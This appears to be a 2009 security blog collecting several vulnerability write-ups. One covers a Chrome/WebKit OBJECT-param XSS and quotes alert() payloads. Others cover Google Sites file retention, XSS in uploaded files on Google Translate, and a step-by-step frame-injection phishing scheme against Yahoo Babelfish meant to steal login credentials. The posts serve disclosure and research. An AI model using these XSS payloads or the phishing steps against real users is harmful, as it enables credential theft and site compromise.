Pages

Sunday, December 27, 2009

Google Chrome/ WebKit - MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency





Google Chrome (including customized webkit)has shown unethical behavior in implementing an embedded object with CLSID parameter. The design bug is presented in the execution of the object element directly in the context of browser. The bug proliferates when a CLSID of certain object is passed and specific URL is allowed to execute as parameter value in it. Before jumping into all aspect of this unexpected and chaotic behavior , let's have a brief look at the W3 specification

!ELEMENT OBJECT - - (PARAM | %flow;)*
-- generic embedded object -->
!ATTLIST OBJECT
%attrs; -- %coreattrs, %i18n, %events --
declare (declare) #IMPLIED -- declare but don't instantiate flag --
classid %URI; #IMPLIED -- identifies an implementation --
codebase %URI; #IMPLIED -- base URI for classid, data, archive--
data %URI; #IMPLIED -- reference to object's data --
type %ContentType; #IMPLIED -- content type for data --
codetype %ContentType; #IMPLIED -- content type for code --
archive CDATA #IMPLIED -- space-separated list of URIs --
standby %Text; #IMPLIED -- message to show while loading --
height %Length; #IMPLIED -- override height --
width %Length; #IMPLIED -- override width --
usemap %URI; #IMPLIED -- use client-side image map --
name CDATA #IMPLIED -- submit as part of form --
tabindex NUMBER #IMPLIED -- position in tabbing order --


classid = uri [CT]
This attribute may be used to specify the location of an object's implementation via a URI. It may be used together with, or as an alternative to the data attribute, depending on the type of object involved.

data = uri [CT]
This attribute may be used to specify the location of the object's data, for instance image data for objects defining images, or more generally, a serialized form of an object which can be used to recreate it. If given as a relative URI, it should be interpreted relative to the codebase attribute.


So as per the recommendations codebase matters a lot. The value should work according to the included object which is known by the CLSID. That's true in the implementation of CLSID parameter through embedded object.

The code that executes positively is mentioned below:
[OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
[param name=url
value=javascript:alert('XSSXSSXSXSXSXSXSXSXSXSXSXSSXSXSXSSXSXXSSS')]
[/OBJECT]

Certain facts are mentioned below

1. The CLSID parameter presented in this part is of MSWORD Scripting Object. The good part is that this code does not get executed in the Internet Explorer 8 and there is no XSS payload execution.

2. All the other browsers such as Mozilla Firefox , Opera and Safari does not execute
this set of payload too. The Safari, which also implements webkit at prime scale does not show any contradictory behavior in this regard.

3. If we talk about HTML5 specification , this is completely unethical in saying that the Google Chrome implements HTML5 then this kind of behavior is accepted. In concern to that latest version of Safari 4 also implements HTML5 specification to a great extent but this execution behavior is not supported.

The contradiction arises as:

1. Google Chrome, itself based on the Webkit and to best of the knowledge , Active X is not supported by the Webkit and Linux platforms. Its a pure windows object class identifiers.

"ActiveX is only supported by Internet Explorer (and browsers built on top of Internet Explorer) on Windows. Google Chrome, Mozilla Firefox, Apple Safari, and others do not support ActiveX. Instead, these browsers make use of the Netscape Plugin Application Programming Interface (NPAPI)."


More:http://www.google.com/chrome/intl/en/webmasters-faq.html#activex

But the general functionality of DOM object execution is based on top to bottom approach i.e tree notation. Primarily the element at the top executes first and then so on.

2. Google Chrome executes the payload in a same manner( which can be used for XSS extensively) with or without the CLSID parameter. This is contradictory in its own sense. One cannot say in any specific nature of browsers that XSS payload execution with or without the CLSID is the same. Its not the appropriate functional part. As the code base point is mentioned in the W3 specification. The URI points to the object location. Ofcourse!

Note: If the browser base is not supporting any type of specific tag attributes the inline code present in it should not be executed. One cannot say that the browser does not recognize the CLSID and it passes the control to the inline object parameter and executed the URI which is completely against the part as the URI is itself defined for that object.

On the second part code execution without the CLSID is generic , in no way it is similar the payload execution with CLSID.

The overall picture of this kind of issue with respect to other browsers is presented below



This represents the overall scenario. The payload can be used to execute XSS attacks stringently. the best probable solution is not to allow code when executed with CLSID as presented in this talk.

On a simpler talk with Google Chrome team about this against the turf behavior there are certain responses which are unacceptable in any case: Have a look

"There is a special case for the "data", "movie" and "src" attributes: http://svn.webkit.org/repository/webkit/trunk/WebCore/html/HTMLParamElement.cpp in "isURLAttribute" and "addSubresourceAttributeURLs".

I expect this has to do with our DNS prefetching; we attempt to start downloading
stuff as soon as we know about it. It may be that Chrome special cases this type of
PARAM, expecting it to be a URL. When it finds out there is nothing to grab off the
internet, it is handled like any other URL and the javascript is executed. The code
may need a bit of tweaking to prevent it from executing javascript; it should only
start download the resource if it contains a valid URL."

"The DNS preresolution would, at the most, do a resolution of a domain, but would never trigger any content fetch or JS execution.

There is also some scanning of content, and pre-fetching expected content. I'd be VERY surprised to hear that it leads to execution prior to such necessity."

"I am actually really curious as to why Chrome is behaving this way, even for unknown clsids. I am guessing it is some sort of a heuristic prefetching mechanism that triggers on parameters named "url"?

If my guess is correct, it would be good to have a peek at this mechanism, and limit
it to http / https, just so that it does not introduce problems elsewhere. That said, I do not see any obvious way how the current behavior would have a negative impact on common web sites - i.e., why we should treat it as a security problem."


"I agree with previous assessment that this is not a particular security issue.I also agree that it would be good to understand the behaviour. Hence: It looks to be WebKit simply passing plugin payload URLs to the frame loader, verbatim.This simply means that in Chrome, the following two URLs constructs behave similarly:

1)[object][param name="url" value="javascript:alert(document.domain)">
[/object]

2)[iframe src="javascript:alert(document.domain)"][/iframe]And obviously, it is any given website's responsibility to NOT pass arbitrary attacker-supplied URLs in either of those attributes."


This statement "it is any given website's responsibility to NOT pass arbitrary attacker-supplied URLs in either of those attributes." is completely obscure with
respect to this bug.

Security Concern: The differential set of payloads always favor the XSS execution and browser inabilities to follow the standard benchmarks.

The result is nothing and no output is on the way. The more stress is not to consider it as a security bug rather finding the real obscurity in it but one can enjoy with this part.

It is seriously out of the way.

Cheers.

Thursday, December 24, 2009

Google Sites Privacy Chaos - Is it unthical or Is this the way it has to be? A Talk!

Google sites provide services to the users for hosting their websites on Google's domain. I was going through the privacy column of this website and a stringent issue regrading content policy came in front of me. The policy is presented below:



There is an excerpt in this privacy policy of Google Sites

You may permanently delete any content you create in Google Sites. Because of the way we maintain this service, residual copies of your files and other information associated with your account may remain on our servers for three weeks.


http://www.google.com/sites/privacy.html

This is completely not true. The policy point is quite okay but considering the real time functionality this policy is not applicable. The time period for residual copies is set for three weeks , I suppose not more than a month. I personally tested the stuff six months back. I have noticed even after six months , the deleted file (a PDF file which I do not want anybody to look into) is still recoverable from the Google site , a quite unacceptable fact. According to the policy, the deleted content should not reside on Google's server for more than three weeks.
Let's see:



So there is an ambiguity in the applied policy of Google sites. Is the policy being implemented in right way?

Ofcourse , Google owns web!

Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk



Google translate services provide an efficient way of translating content. The web is a playground for attackers and everyday new bug or flaw is detected in the web services provided by major giants. An interesting concept is to dissect the web based design of websites handling user generated content. On discussion with Google about this problem , the issues is treated as design by default.

The problem (or web bug) persists in the file uploading feature on Google translate website Malicious content such as XSS payload , Iframe, etc. gets executed and rendered into the context of the running website. On discussion with Google it was stated that:

"With JavaScript is executed on the translate.googleusercontent.com domain,rather than translate.google.com. This is by design as files uploaded to the translate service are regarded as untrusted content."

There are two features provided by Google translate service which are mentioned below
1. Translation through file uploading.
2. Direct translation of content online.



Question: Why users consider translation services as secure? What If somebody is doing some monetary transaction or some other issues like that?

The question and answer in itself is hard to answer. But one thing is sure for any critical work, the translate services should not be used.

Let's have a look at the attack point:

Step 1: Uploading a malicious content file through Google Translate service



Step 2: Executing Content



Another layout



Looking at the different domains

1. translate.google.com

Name: www3.l.google.com
Addresses: 209.85.231.102
209.85.231.100
209.85.231.101
Aliases: translate.google.com

2. translate.googleusercontent.com

Name: googlehosted.l.google.com
Address: 209.85.231.132
Aliases: translate.googleusercontent.com


Both the google.com and googleusercontent.com serves the same google search functionality. The specific user content server can be used for differential purposes because content on it is not trusted.

Looking for the different perspective.It would be great if a small message is being displayed on the Google translate service bar as mentioned below

"Google does not assure the integrity of the source of the content"

After considering this as a notification, I checked the Bing translation which already have applied this notification message. Great.




May be its not a solution but a good step in visualizing your concern about content is a better design practice.

Note: a previously reported phishing vulnerability in Google translation was patched and a check was introduced by Google on the source and destination translation languages.


Saturday, December 19, 2009

Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency

Yahoo Babel-fish online is a service for translating content to different languages. The stringent design bug leads to the possibility of conducting FRAME injection attacks in the context of yahoo domain there by resulting in third-party attacks. The issues has been demonstrated in some of my recent conferences. The flaw can be summed up as:

1. There is no referrer check on the origin i.e. the source of request.
2. Direct links can be used to send requests.
2. Iframes can be loaded directly into the context of domain.

Points to ponder:
1. Yahoo login Page – perform certain checks , authorized ones.
2. Yahoo implements FRAME Bursting in the main login Page.

It is possible to remove that small piece of code and design a similar page with same elements that can be used further. It is possible to impersonate the trust of primary domain (YAHOO in this case) for legitimate attacks. There is a possibility of different attacks on YAHOO users.

Note: there is no specific notification is displayed on the top of a translated page.

Attacker can conduct a FRAME attack by following below mentioned steps

1. Remove the above stated entities code from the main Login Page.
2. Design the fake domain. Load in the context of Yahoo domain
3. Inline IFRAME provides a familiar fake Login page.
4. Set the backdoor in the Login input boxes for stealing credentials.
5. Trap the victims by diversifying the manipulated URL’s on the Web.One can use
dedicated spamming.
6. The attack is all set to work.

Step 1: Injecting IFRAME - Modified














Step 2 – Stealing Credentials















DEMONSTRATION

This attack works successfully. This is a demo setup.You can try some credentials and try to login. :)